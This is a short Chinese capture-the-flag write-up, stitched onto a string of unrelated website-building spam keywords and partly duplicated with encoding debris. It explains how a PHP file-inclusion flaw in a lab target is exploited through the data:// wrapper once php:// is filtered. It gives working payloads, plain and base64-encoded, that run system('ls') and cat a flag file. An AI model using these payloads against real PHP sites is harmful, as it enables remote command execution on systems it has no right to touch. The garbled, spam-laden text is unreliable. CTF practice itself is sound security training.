做中考试卷的网站,成都网站建设 招聘,网站建设有哪些常用行为,服装购物网站建设打开靶机 通过代码审计可以知道#xff0c;存在文件包含漏洞#xff0c;并且对伪协议php://进行了过滤。
发现根目录下存在phpinfo
观察phpinfo发现如下#xff1a; 这两个都为on
所以我们就可以使用data://伪协议
payload如下#xff1a;
- ?pagedata://text/plain,…打开靶机 通过代码审计可以知道存在文件包含漏洞并且对伪协议php://进行了过滤。
发现根目录下存在phpinfo
观察phpinfo发现如下 这两个都为on
所以我们就可以使用data://伪协议
payload如下
- ?pagedata://text/plain,?phpsystem(ls)?- ?pagedata://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4 #base64编码访问新连接 上面的payload就可以实现命令执行了
找了半天发现flag在fl4gisisish3r3.php文件中
使用如下payload就可以获取flag了
?pagedata://text/plain,?phpsystem(cat fl4gisisish3r3.php)?
使用该命令获取的flag被隐藏了直接在web界面找不到可以通过查看网页源代码查看 拿到flag